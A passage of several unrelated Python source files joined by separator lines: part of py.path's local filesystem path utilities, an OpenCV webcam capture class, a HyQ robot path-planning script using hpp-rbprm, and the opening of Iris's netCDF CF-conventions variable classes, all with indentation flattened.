if modname is None:
pkgpath = self.pypkgpath()
if pkgpath is not None:
pkgroot = pkgpath.dirpath()
names = self.new(ext="").relto(pkgroot).split(self.sep)
if names[-1] == "__init__":
names.pop()
modname = ".".join(names)
else:
pkgroot = self.dirpath()
modname = self.purebasename
self._ensuresyspath(ensuresyspath, pkgroot)
__import__(modname)
mod = sys.modules[modname]
if self.basename == "__init__.py":
return mod # we don't check anything as we might
# we in a namespace package ... too icky to check
modfile = mod.__file__
if modfile[-4:] in ('.pyc', '.pyo'):
modfile = modfile[:-1]
elif modfile.endswith('$py.class'):
modfile = modfile[:-9] + '.py'
if modfile.endswith(os.path.sep + "__init__.py"):
if self.basename != "__init__.py":
modfile = modfile[:-12]
try:
issame = self.samefile(modfile)
except py.error.ENOENT:
issame = False
if not issame:
raise self.ImportMismatchError(modname, modfile, self)
return mod
else:
try:
return sys.modules[modname]
except KeyError:
# we have a custom modname, do a pseudo-import
mod = py.std.types.ModuleType(modname)
mod.__file__ = str(self)
sys.modules[modname] = mod
try:
py.builtin.execfile(str(self), mod.__dict__)
except:
del sys.modules[modname]
raise
return mod
def sysexec(self, *argv, **popen_opts):
""" return stdout text from executing a system child process,
where the 'self' path points to executable.
The process is directly invoked and not through a system shell.
"""
from subprocess import Popen, PIPE
argv = map_as_list(str, argv)
popen_opts['stdout'] = popen_opts['stderr'] = PIPE
proc = Popen([str(self)] + argv, **popen_opts)
stdout, stderr = proc.communicate()
ret = proc.wait()
if py.builtin._isbytes(stdout):
stdout = py.builtin._totext(stdout, sys.getdefaultencoding())
if ret != 0:
if py.builtin._isbytes(stderr):
stderr = py.builtin._totext(stderr, sys.getdefaultencoding())
raise py.process.cmdexec.Error(ret, ret, str(self),
stdout, stderr,)
return stdout
def sysfind(cls, name, checker=None, paths=None):
""" return a path object found by looking at the systems
underlying PATH specification. If the checker is not None
it will be invoked to filter matching paths. If a binary
cannot be found, None is returned
Note: This is probably not working on plain win32 systems
but may work on cygwin.
"""
if isabs(name):
p = py.path.local(name)
if p.check(file=1):
return p
else:
if paths is None:
if iswin32:
paths = py.std.os.environ['Path'].split(';')
if '' not in paths and '.' not in paths:
paths.append('.')
try:
systemroot = os.environ['SYSTEMROOT']
except KeyError:
pass
else:
paths = [re.sub('%SystemRoot%', systemroot, path)
for path in paths]
else:
paths = py.std.os.environ['PATH'].split(':')
tryadd = []
if iswin32:
tryadd += os.environ['PATHEXT'].split(os.pathsep)
tryadd.append("")
for x in paths:
for addext in tryadd:
p = py.path.local(x).join(name, abs=True) + addext
try:
if p.check(file=1):
if checker:
if not checker(p):
continue
return p
except py.error.EACCES:
pass
return None
sysfind = classmethod(sysfind)
def _gethomedir(cls):
try:
x = os.environ['HOME']
except KeyError:
try:
x = os.environ["HOMEDRIVE"] + os.environ['HOMEPATH']
except KeyError:
return None
return cls(x)
_gethomedir = classmethod(_gethomedir)
#"""
#special class constructors for local filesystem paths
#"""
def get_temproot(cls):
""" return the system's temporary directory
(where tempfiles are usually created in)
"""
return py.path.local(py.std.tempfile.gettempdir())
get_temproot = classmethod(get_temproot)
def mkdtemp(cls, rootdir=None):
""" return a Path object pointing to a fresh new temporary directory
(which we created ourself).
"""
import tempfile
if rootdir is None:
rootdir = cls.get_temproot()
return cls(py.error.checked_call(tempfile.mkdtemp, dir=str(rootdir)))
mkdtemp = classmethod(mkdtemp)
def make_numbered_dir(cls, prefix='session-', rootdir=None, keep=3,
lock_timeout = 172800): # two days
""" return unique directory with a number greater than the current
maximum one. The number is assumed to start directly after prefix.
if keep is true directories with a number less than (maxnum-keep)
will be removed.
"""
if rootdir is None:
rootdir = cls.get_temproot()
nprefix = normcase(prefix)
def parse_num(path):
""" parse the number out of a path (if it matches the prefix) """
nbasename = normcase(path.basename)
if nbasename.startswith(nprefix):
try:
return int(nbasename[len(nprefix):])
except ValueError:
pass
# compute the maximum number currently in use with the
# prefix
lastmax = None
while True:
maxnum = -1
for path in rootdir.listdir():
num = parse_num(path)
if num is not None:
maxnum = max(maxnum, num)
# make the new directory
try:
udir = rootdir.mkdir(prefix + str(maxnum+1))
except py.error.EEXIST:
# race condition: another thread/process created the dir
# in the meantime. Try counting again
if lastmax == maxnum:
raise
lastmax = maxnum
continue
break
# put a .lock file in the new directory that will be removed at
# process exit
if lock_timeout:
lockfile = udir.join('.lock')
mypid = os.getpid()
if hasattr(lockfile, 'mksymlinkto'):
lockfile.mksymlinkto(str(mypid))
else:
lockfile.write(str(mypid))
def try_remove_lockfile():
# in a fork() situation, only the last process should
# remove the .lock, otherwise the other processes run the
# risk of seeing their temporary dir disappear. For now
# we remove the .lock in the parent only (i.e. we assume
# that the children finish before the parent).
if os.getpid() != mypid:
return
try:
lockfile.remove()
except py.error.Error:
pass
atexit.register(try_remove_lockfile)
# prune old directories
if keep:
for path in rootdir.listdir():
num = parse_num(path)
if num is not None and num <= (maxnum - keep):
lf = path.join('.lock')
try:
t1 = lf.lstat().mtime
t2 = lockfile.lstat().mtime
if not lock_timeout or abs(t2-t1) < lock_timeout:
continue # skip directories still locked
except py.error.Error:
pass # assume that it means that there is no 'lf'
try:
path.remove(rec=1)
except KeyboardInterrupt:
raise
except: # this might be py.error.Error, WindowsError ...
pass
# make link...
try:
username = os.environ['USER'] #linux, et al
except KeyError:
try:
username = os.environ['USERNAME'] #windows
except KeyError:
username = 'current'
src = str(udir)
dest = src[:src.rfind('-')] + '-' + username
try:
os.unlink(dest)
except OSError:
pass
try:
os.symlink(src, dest)
except (OSError, AttributeError, NotImplementedError):
pass
return udir
make_numbered_dir = classmethod(make_numbered_dir)
def copymode(src, dest):
""" copy permission from src to dst. """
py.std.shutil.copymode(src, dest)
def copystat(src, dest):
""" copy permission, last modification time, last access time, and flags from src to dst."""
py.std.shutil.copystat(str(src), str(dest))
def copychunked(src, dest):
chunksize = 524288 # half a meg of bytes
fsrc = src.open('rb')
try:
fdest = dest.open('wb')
try:
while 1:
buf = fsrc.read(chunksize)
if not buf:
break
fdest.write(buf)
finally:
fdest.close()
finally:
fsrc.close()
def isimportable(name):
if name and (name[0].isalpha() or name[0] == '_'):
name = name.replace("_", '')
return not name or name.isalnum()
|
"""
sc_webcam.py
This file includes functions to:
initialise a web cam
capture image from web cam
Image size is held in the smart_camera.cnf
"""
import sys
import time
import math
import cv2
import sc_config
class SmartCameraWebCam:
def __init__(self, instance):
# health
self.healthy = False;
# record instance
self.instance = instance
self.config_group = "camera%d" % self.instance
# get image resolution
self.img_width = sc_config.config.get_integer(self.config_group,'width',640)
self.img_height = sc_config.config.get_integer(self.config_group,'height',480)
# background image processing variables
self.img_counter = 0 # num images requested so far
# latest image captured
self.latest_image = None
# setup video capture
self.camera = cv2.VideoCapture(self.instance)
# check we can connect to camera
if not self.camera.isOpened():
print ("failed to open webcam %d" % self.instance)
# __str__ - print position vector as string
def __str__(self):
return "SmartCameraWebCam Object W:%d H:%d" % (self.img_width, self.img_height)
# latest_image - returns latest image captured
def get_latest_image(self):
# write to file
#imgfilename = "C:\Users\rmackay9\Documents\GitHub\ardupilot-balloon-finder\smart_camera\img%d-%d.jpg" % (cam_num,cam.get_image_counter())
imgfilename = "img%d-%d.jpg" % (self.instance,self.get_image_counter())
print (imgfilename)
cv2.imwrite(imgfilename, self.latest_image)
return self.latest_image
# get_image_counter - returns number of images captured since startup
def get_image_counter(self):
return self.img_counter
# take_picture - take a picture
# returns True on success
def take_picture(self):
# setup video capture
print("Taking Picture")
self.camera = cv2.VideoCapture(self.instance)
self.camera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH,self.img_width)
self.camera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT,self.img_height)
# check we can connect to camera
if not self.camera.isOpened():
self.healty = False
return False
# get an image from the webcam
success_flag, self.latest_image=self.camera.read()
# release camera
self.camera.release()
# if successful overwrite our latest image
if success_flag:
self.img_counter = self.img_counter+1
return True
# return failure
return False
# main - tests SmartCameraWebCam class
def main(self):
while True:
# send request to image capture for image
if self.take_picture():
# display image
cv2.imshow ('image_display', self.get_latest_image())
else:
print ("no image")
# check for ESC key being pressed
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
# take a rest for a bit
time.sleep(0.01)
if __name__ == "__main__":
sc_webcam0 = SmartCameraWebCam(0)
sc_webcam0.main()
|
from hpp.corbaserver.rbprm.rbprmbuilder import Builder
from hpp.gepetto import Viewer
rootJointType = 'freeflyer'
packageName = 'hpp-rbprm-corba'
meshPackageName = 'hpp-rbprm-corba'
urdfName = 'hyq_trunk_large'
urdfNameRom = ['hyq_lhleg_rom','hyq_lfleg_rom','hyq_rfleg_rom','hyq_rhleg_rom']
urdfSuffix = ""
srdfSuffix = ""
rbprmBuilder = Builder ()
rbprmBuilder.loadModel(urdfName, urdfNameRom, rootJointType, meshPackageName, packageName, urdfSuffix, srdfSuffix)
rbprmBuilder.setJointBounds ("base_joint_xyz", [-2,5, -1, 1, 0.3, 4])
rbprmBuilder.setFilter(['hyq_rhleg_rom']) # , 'hyq_lfleg_rom', 'hyq_rfleg_rom','hyq_lhleg_rom'])
rbprmBuilder.setAffordanceFilter('hyq_rhleg_rom', ['Support', 'Lean'])
rbprmBuilder.boundSO3([-0.4,0.4,-3,3,-3,3])
from hpp.corbaserver.rbprm.problem_solver import ProblemSolver
ps = ProblemSolver( rbprmBuilder )
r = Viewer (ps)
r.loadObstacleModel (packageName, "darpa", "planning")
q_init = rbprmBuilder.getCurrentConfig ();
q_init [0:3] = [-2, 0, 0.63]; rbprmBuilder.setCurrentConfig (q_init); r (q_init)
q_goal = q_init [::]
q_goal [0:3] = [3, 0, 0.63]; r (q_goal)
ps.setInitialConfig (q_init)
ps.addGoalConfig (q_goal)
from hpp.corbaserver.affordance import Client
c = Client ()
c.affordance.analyseAll ()
objs = c.affordance.getAffordancePoints ("Support")
import random
count = 0
for aff in objs:
colour = random.random()
for tri in aff:
r.client.gui.addTriangleFace('tri' + str(count), tri[0], tri[1], tri[2], [colour, 1, 0.5, 1])
r.client.gui.addToGroup('tri' + str(count), 'planning')
count += 1
ps.client.problem.selectConFigurationShooter("RbprmShooter")
ps.client.problem.selectPathValidation("RbprmPathValidation",0.05)
t = ps.solve ()
from hpp.gepetto import PathPlayer
pp = PathPlayer (rbprmBuilder.client.basic, r)
pp (0)
|
"""
Provides the capability to load netCDF files and interpret them
according to the 'NetCDF Climate and Forecast (CF) Metadata Conventions'.
References:
[CF] NetCDF Climate and Forecast (CF) Metadata conventions.
[NUG] NetCDF User's Guide, https://www.unidata.ucar.edu/software/netcdf/documentation/NUG/
"""
from abc import ABCMeta, abstractmethod
from collections.abc import Iterable, MutableMapping
import os
import re
import warnings
import netCDF4
import numpy as np
import numpy.ma as ma
import iris.util
_CF_PARSE = re.compile(
r"""
\s*
(?P<lhs>[\w_]+)
\s*:\s*
(?P<rhs>[\w_]+)
\s*
""",
re.VERBOSE,
)
_CF_ATTRS_IGNORE = set(
["_FillValue", "add_offset", "missing_value", "scale_factor"]
)
reference_terms = dict(
atmosphere_sigma_coordinate=["ps"],
atmosphere_hybrid_sigma_pressure_coordinate=["ps"],
atmosphere_hybrid_height_coordinate=["orog"],
atmosphere_sleve_coordinate=["zsurf1", "zsurf2"],
ocean_sigma_coordinate=["eta", "depth"],
ocean_s_coordinate=["eta", "depth"],
ocean_sigma_z_coordinate=["eta", "depth"],
ocean_s_coordinate_g1=["eta", "depth"],
ocean_s_coordinate_g2=["eta", "depth"],
)
def _is_str_dtype(var):
return np.issubdtype(var.dtype, np.bytes_)
class CFVariable(metaclass=ABCMeta):
"""Abstract base class wrapper for a CF-netCDF variable."""
#: Name of the netCDF variable attribute that identifies this
#: CF-netCDF variable.
cf_identity = None
def __init__(self, name, data):
# Accessing the list of netCDF attributes is surprisingly slow.
# Since it's used repeatedly, caching the list makes things
# quite a bit faster.
self._nc_attrs = data.ncattrs()
#: NetCDF variable name.
self.cf_name = name
#: NetCDF4 Variable data instance.
self.cf_data = data
#: Collection of CF-netCDF variables associated with this variable.
self.cf_group = None
#: CF-netCDF formula terms that his variable participates in.
self.cf_terms_by_root = {}
self.cf_attrs_reset()
@staticmethod
def _identify_common(variables, ignore, target):
if ignore is None:
ignore = []
if target is None:
target = variables
elif isinstance(target, str):
if target not in variables:
raise ValueError(
"Cannot identify unknown target CF-netCDF variable %r"
% target
)
target = {target: variables[target]}
else:
raise TypeError("Expect a target CF-netCDF variable name")
return (ignore, target)
@abstractmethod
def identify(self, variables, ignore=None, target=None, warn=True):
"""
Identify all variables that match the criterion for this CF-netCDF variable class.
Args:
* variables:
Dictionary of netCDF4.Variable instance by variable name.
Kwargs:
* ignore:
List of variable names to ignore.
* target:
Name of a single variable to check.
* warn:
Issue a warning if a missing variable is referenced.
Returns:
Dictionary of CFVariable instance by variable name.
"""
pass
def spans(self, cf_variable):
"""
Determine whether the dimensionality of this variable
is a subset of the specified target variable.
Note that, by default scalar variables always span the
dimensionality of the target variable.
Args:
* cf_variable:
Compare dimensionality with the :class:`CFVariable`.
Returns:
Boolean.
"""
result = set(self.dimensions).issubset(cf_variable.dimensions)
return result
def __eq__(self, other):
# CF variable names are unique.
return self.cf_name == other.cf_name
def __ne__(self, other):
# CF variable names are unique.
return self.cf_name != other.cf_name
def __hash__(self):
# CF variable names are unique.
return hash(self.cf_name)
def __getattr__(self, name):
# Accessing netCDF attributes is surprisingly slow. Since
# they're often read repeatedly, caching the values makes things
# quite a bit faster.
if name in self._nc_attrs:
self._cf_attrs.add(name)
value = getattr(self.cf_data, name)
setattr(self, name, value)
return value
def __getitem__(self, key):
return self.cf_data.__getitem__(key)
def __len__(self):
return self.cf_data.__len__()
def __repr__(self):
return "%s(%r, %r)" % (
self.__class__.__name__,
self.cf_name,
self.cf_data,
)
def cf_attrs(self):
"""Return a list of all attribute name and value pairs of the CF-netCDF variable."""
return tuple(
(attr, self.getncattr(attr)) for attr in sorted(self._nc_attrs)
)
def cf_attrs_ignored(self):
"""Return a list of all ignored attribute name and value pairs of the CF-netCDF variable."""
return tuple(
(attr, self.getncattr(attr))
for attr in sorted(set(self._nc_attrs) & _CF_ATTRS_IGNORE)
)
def cf_attrs_used(self):
"""Return a list of all accessed attribute name and value pairs of the CF-netCDF variable."""
return tuple(
(attr, self.getncattr(attr)) for attr in sorted(self._cf_attrs)
)
def cf_attrs_unused(self):
"""Return a list of all non-accessed attribute name and value pairs of the CF-netCDF variable."""
return tuple(
(attr, self.getncattr(attr))
for attr in sorted(set(self._nc_attrs) - self._cf_attrs)
)
def cf_attrs_reset(self):
"""Reset the history of accessed attribute names of the CF-netCDF variable."""
self._cf_attrs = set([item[0] for item in self.cf_attrs_ignored()])
def add_formula_term(self, root, term):
"""
Register the participation of this CF-netCDF variable in a CF-netCDF formula term.
Args:
* root (string):
The name of CF-netCDF variable that defines the CF-netCDF formula_terms attribute.
* term (string):
The associated term name of this variable in the formula_terms definition.
Returns:
None.
"""
self.cf_terms_by_root[root] = term
def has_formula_terms(self):
"""
Determine whether this CF-netCDF variable participates in a CF-netcdf formula term.
Returns:
Boolean.
"""
return bool(self.cf_terms_by_root)
class CFAncillaryDataVariable(CFVariable):
"""
A CF-netCDF ancillary data variable is a variable that provides metadata
about the individual values of another data variable.
Identified by the CF-netCDF variable attribute 'ancillary_variables'.
Ref: [CF] Section 3.4. Ancillary Data.
"""
cf_identity = "ancillary_variables"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF ancillary data variables.
for nc_var_name, nc_var in target.items():
# Check for ancillary data variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for name in nc_var_att.split():
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF ancillary data variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
result[name] = CFAncillaryDataVariable(
name, variables[name]
)
return result
class CFAuxiliaryCoordinateVariable(CFVariable):
"""
A CF-netCDF auxiliary coordinate variable is any netCDF variable that contains
coordinate data, but is not a CF-netCDF coordinate variable by definition.
There is no relationship between the name of a CF-netCDF auxiliary coordinate
variable and the name(s) of its dimension(s).
Identified by the CF-netCDF variable attribute 'coordinates'.
Also see :class:`iris.fileformats.cf.CFLabelVariable`.
Ref: [CF] Chapter 5. Coordinate Systems.
[CF] Section 6.2. Alternative Coordinates.
"""
cf_identity = "coordinates"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF auxiliary coordinate variables.
for nc_var_name, nc_var in target.items():
# Check for auxiliary coordinate variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for name in nc_var_att.split():
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF auxiliary coordinate variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
# Restrict to non-string type i.e. not a CFLabelVariable.
if not _is_str_dtype(variables[name]):
result[name] = CFAuxiliaryCoordinateVariable(
name, variables[name]
)
return result
class CFBoundaryVariable(CFVariable):
"""
A CF-netCDF boundary variable is associated with a CF-netCDF variable that contains
coordinate data. When a data value provides information about conditions in a cell
occupying a region of space/time or some other dimension, the boundary variable
provides a description of cell extent.
A CF-netCDF boundary variable will have one more dimension than its associated
CF-netCDF coordinate variable or CF-netCDF auxiliary coordinate variable.
Identified by the CF-netCDF variable attribute 'bounds'.
Ref: [CF] Section 7.1. Cell Boundaries.
"""
cf_identity = "bounds"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF boundary variables.
for nc_var_name, nc_var in target.items():
# Check for a boundary variable reference.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
name = nc_var_att.strip()
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF boundary variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
result[name] = CFBoundaryVariable(
name, variables[name]
)
return result
def spans(self, cf_variable):
"""
Determine whether the dimensionality of this variable
is a subset of the specified target variable.
Note that, by default scalar variables always span the
dimensionality of the target variable.
Args:
* cf_variable:
Compare dimensionality with the :class:`CFVariable`.
Returns:
Boolean.
"""
# Scalar variables always span the target variable.
result = True
if self.dimensions:
source = self.dimensions
target = cf_variable.dimensions
# Ignore the bounds extent dimension.
result = set(source[:-1]).issubset(target) or set(
source[1:]
).issubset(target)
return result
class CFClimatologyVariable(CFVariable):
"""
A CF-netCDF climatology variable is associated with a CF-netCDF variable that contains
coordinate data. When a data value provides information about conditions in a cell
occupying a region of space/time or some other dimension, the climatology variable
provides a climatological description of cell extent.
A CF-netCDF climatology variable will have one more dimension than its associated
CF-netCDF coordinate variable.
Identified by the CF-netCDF variable attribute 'climatology'.
Ref: [CF] Section 7.4. Climatological Statistics
"""
cf_identity = "climatology"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF climatology variables.
for nc_var_name, nc_var in target.items():
# Check for a climatology variable reference.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
name = nc_var_att.strip()
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF climatology variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
result[name] = CFClimatologyVariable(
name, variables[name]
)
return result
def spans(self, cf_variable):
"""
Determine whether the dimensionality of this variable
is a subset of the specified target variable.
Note that, by default scalar variables always span the
dimensionality of the target variable.
Args:
* cf_variable:
Compare dimensionality with the :class:`CFVariable`.
Returns:
Boolean.
"""
# Scalar variables always span the target variable.
result = True
if self.dimensions:
source = self.dimensions
target = cf_variable.dimensions
# Ignore the climatology extent dimension.
result = set(source[:-1]).issubset(target) or set(
source[1:]
).issubset(target)
return result
class CFCoordinateVariable(CFVariable):
"""
A CF-netCDF coordinate variable is a one-dimensional variable with the same name
as its dimension, and it is defined as a numeric data type with values that are
ordered monotonically. Missing values are not allowed in CF-netCDF coordinate
variables. Also see [NUG] Section 2.3.1.
Identified by the above criterion, there is no associated CF-netCDF variable
attribute.
Ref: [CF] 1.2. Terminology.
"""
@classmethod
def identify(
cls, variables, ignore=None, target=None, warn=True, monotonic=False
):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF coordinate variables.
for nc_var_name, nc_var in target.items():
if nc_var_name in ignore:
continue
# String variables can't be coordinates
if _is_str_dtype(nc_var):
continue
# Restrict to one-dimensional with name as dimension
if not (nc_var.ndim == 1 and nc_var_name in nc_var.dimensions):
continue
# Restrict to monotonic?
if monotonic:
data = nc_var[:]
# Gracefully fill a masked coordinate.
if ma.isMaskedArray(data):
data = ma.filled(data)
if (
nc_var.shape == ()
or nc_var.shape == (1,)
or iris.util.monotonic(data)
):
result[nc_var_name] = CFCoordinateVariable(
nc_var_name, nc_var
)
else:
result[nc_var_name] = CFCoordinateVariable(nc_var_name, nc_var)
return result
class CFDataVariable(CFVariable):
"""
A CF-netCDF variable containing data pay-load that maps to an Iris :class:`iris.cube.Cube`.
"""
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
raise NotImplementedError
class _CFFormulaTermsVariable(CFVariable):
"""
A CF-netCDF formula terms variable corresponds to a term in a formula that
allows dimensional vertical coordinate values to be computed from dimensionless
vertical coordinate values and associated variables at specific grid points.
Identified by the CF-netCDF variable attribute 'formula_terms'.
Ref: [CF] Section 4.3.2. Dimensional Vertical Coordinate.
[CF] Appendix D. Dimensionless Vertical Coordinates.
"""
cf_identity = "formula_terms"
def __init__(self, name, data, formula_root, formula_term):
CFVariable.__init__(self, name, data)
# Register the formula root and term relationship.
self.add_formula_term(formula_root, formula_term)
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF formula terms variables.
for nc_var_name, nc_var in target.items():
# Check for formula terms variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for match_item in _CF_PARSE.finditer(nc_var_att):
match_group = match_item.groupdict()
# Ensure that term name is lower case, as expected.
term_name = match_group["lhs"].lower()
variable_name = match_group["rhs"]
if variable_name not in ignore:
if variable_name not in variables:
if warn:
message = "Missing CF-netCDF formula term variable %r, referenced by netCDF variable %r"
warnings.warn(
message % (variable_name, nc_var_name)
)
else:
if variable_name not in result:
result[
variable_name
] = _CFFormulaTermsVariable(
variable_name,
variables[variable_name],
nc_var_name,
term_name,
)
else:
result[variable_name].add_formula_term(
nc_var_name, term_name
)
return result
def __repr__(self):
return "%s(%r, %r, %r)" % (
self.__class__.__name__,
self.cf_name,
self.cf_data,
self.cf_terms_by_root,
)
class CFGridMappingVariable(CFVariable):
"""
A CF-netCDF grid mapping variable contains a list of specific attributes that
define a particular grid mapping. A CF-netCDF grid mapping variable must contain
the attribute 'grid_mapping_name'.
Based on the value of the 'grid_mapping_name' attribute, there are associated
standard names of CF-netCDF coordinate variables that contain the mapping's
independent variables.
Identified by the CF-netCDF variable attribute 'grid_mapping'.
Ref: [CF] Section 5.6. Horizontal Coordinate Reference Systems, Grid Mappings, and Projections.
[CF] Appendix F. Grid Mappings.
"""
cf_identity = "grid_mapping"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all grid mapping variables.
for nc_var_name, nc_var in target.items():
# Check for a grid mapping variable reference.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
name = nc_var_att.strip()
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF grid mapping variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
result[name] = CFGridMappingVariable(
name, variables[name]
)
return result
class CFLabelVariable(CFVariable):
"""
A CF-netCDF CF label variable is any netCDF variable that contain string
textual information, or labels.
Identified by the CF-netCDF variable attribute 'coordinates'.
Also see :class:`iris.fileformats.cf.CFAuxiliaryCoordinateVariable`.
Ref: [CF] Section 6.1. Labels.
"""
cf_identity = "coordinates"
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF label variables.
for nc_var_name, nc_var in target.items():
# Check for label variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for name in nc_var_att.split():
if name not in ignore:
if name not in variables:
if warn:
message = "Missing CF-netCDF label variable %r, referenced by netCDF variable %r"
warnings.warn(message % (name, nc_var_name))
else:
# Register variable, but only allow string type.
var = variables[name]
if _is_str_dtype(var):
result[name] = CFLabelVariable(name, var)
return result
def cf_label_data(self, cf_data_var):
"""
Return the associated CF-netCDF label variable strings.
Args:
* cf_data_var (:class:`iris.fileformats.cf.CFDataVariable`):
The CF-netCDF data variable which the CF-netCDF label variable describes.
Returns:
String labels.
"""
if not isinstance(cf_data_var, CFDataVariable):
raise TypeError(
"cf_data_var argument should be of type CFDataVariable. Got %r."
% type(cf_data_var)
)
# Determine the name of the label string (or length) dimension by
# finding the dimension name that doesn't exist within the data dimensions.
str_dim_name = list(set(self.dimensions) - set(cf_data_var.dimensions))
if len(str_dim_name) != 1:
raise ValueError(
"Invalid string dimensions for CF-netCDF label variable %r"
% self.cf_name
)
str_dim_name = str_dim_name[0]
label_data = self[:]
if ma.isMaskedArray(label_data):
label_data = label_data.filled()
# Determine whether we have a string-valued scalar label
# i.e. a character variable that only has one dimension (the length of the string).
if self.ndim == 1:
label_string = b"".join(label_data).strip()
label_string = label_string.decode("utf8")
data = np.array([label_string])
else:
# Determine the index of the string dimension.
str_dim = self.dimensions.index(str_dim_name)
# Calculate new label data shape (without string dimension) and create payload array.
new_shape = tuple(
dim_len for i, dim_len in enumerate(self.shape) if i != str_dim
)
string_basetype = "|U%d"
string_dtype = string_basetype % self.shape[str_dim]
data = np.empty(new_shape, dtype=string_dtype)
for index in np.ndindex(new_shape):
# Create the slice for the label data.
if str_dim == 0:
label_index = (slice(None, None),) + index
else:
label_index = index + (slice(None, None),)
label_string = b"".join(label_data[label_index]).strip()
label_string = label_string.decode("utf8")
data[index] = label_string
return data
def cf_label_dimensions(self, cf_data_var):
"""
Return the name of the associated CF-netCDF label variable data dimensions.
Args:
* cf_data_var (:class:`iris.fileformats.cf.CFDataVariable`):
The CF-netCDF data variable which the CF-netCDF label variable describes.
Returns:
Tuple of label data dimension names.
"""
if not isinstance(cf_data_var, CFDataVariable):
raise TypeError(
"cf_data_var argument should be of type CFDataVariable. Got %r."
% type(cf_data_var)
)
return tuple(
[
dim_name
for dim_name in self.dimensions
if dim_name in cf_data_var.dimensions
]
)
def spans(self, cf_variable):
"""
Determine whether the dimensionality of this variable
is a subset of the specified target variable.
Note that, by default scalar variables always span the
dimensionality of the target variable.
Args:
* cf_variable:
Compare dimensionality with the :class:`CFVariable`.
Returns:
Boolean.
"""
# Scalar variables always span the target variable.
result = True
if self.dimensions:
source = self.dimensions
target = cf_variable.dimensions
# Ignore label string length dimension.
result = set(source[:-1]).issubset(target) or set(
source[1:]
).issubset(target)
return result
class CFMeasureVariable(CFVariable):
"""
A CF-netCDF measure variable is a variable that contains cell areas or volumes.
Identified by the CF-netCDF variable attribute 'cell_measures'.
Ref: [CF] Section 7.2. Cell Measures.
"""
cf_identity = "cell_measures"
def __init__(self, name, data, measure):
CFVariable.__init__(self, name, data)
#: Associated cell measure of the cell variable
self.cf_measure = measure
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF measure variables.
for nc_var_name, nc_var in target.items():
# Check for measure variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for match_item in _CF_PARSE.finditer(nc_var_att):
match_group = match_item.groupdict()
measure = match_group["lhs"]
variable_name = match_group["rhs"]
var_matches_nc = variable_name != nc_var_name
if variable_name not in ignore and var_matches_nc:
if variable_name not in variables:
if warn:
message = "Missing CF-netCDF measure variable %r, referenced by netCDF variable %r"
warnings.warn(
message % (variable_name, nc_var_name)
)
else:
result[variable_name] = CFMeasureVariable(
variable_name,
variables[variable_name],
measure,
)
return result
class CFGroup(MutableMapping):
"""
Represents a collection of 'NetCDF Climate and Forecast (CF) Metadata
Conventions' variables and netCDF global attributes.
"""
def __init__(self):
#: Collection of CF-netCDF variables
self._cf_variables = {}
#: Collection of netCDF global attributes
self.global_attributes = {}
#: Collection of CF-netCDF variables promoted to a CFDataVariable.
self.promoted = {}
def _cf_getter(self, cls):
# Generate dictionary with dictionary comprehension.
return {
cf_name: cf_var
for cf_name, cf_var in self._cf_variables.items()
if isinstance(cf_var, cls)
}
@property
def ancillary_variables(self):
"""Collection of CF-netCDF ancillary variables."""
return self._cf_getter(CFAncillaryDataVariable)
@property
def auxiliary_coordinates(self):
"""Collection of CF-netCDF auxiliary coordinate variables."""
return self._cf_getter(CFAuxiliaryCoordinateVariable)
@property
def bounds(self):
"""Collection of CF-netCDF boundary variables."""
return self._cf_getter(CFBoundaryVariable)
@property
def climatology(self):
"""Collection of CF-netCDF climatology variables."""
return self._cf_getter(CFClimatologyVariable)
@property
def coordinates(self):
"""Collection of CF-netCDF coordinate variables."""
return self._cf_getter(CFCoordinateVariable)
@property
def data_variables(self):
"""Collection of CF-netCDF data pay-load variables."""
return self._cf_getter(CFDataVariable)
@property
def formula_terms(self):
"""Collection of CF-netCDF variables that participate in a CF-netCDF formula term."""
return {
cf_name: cf_var
for cf_name, cf_var in self._cf_variables.items()
if cf_var.has_formula_terms()
}
@property
def grid_mappings(self):
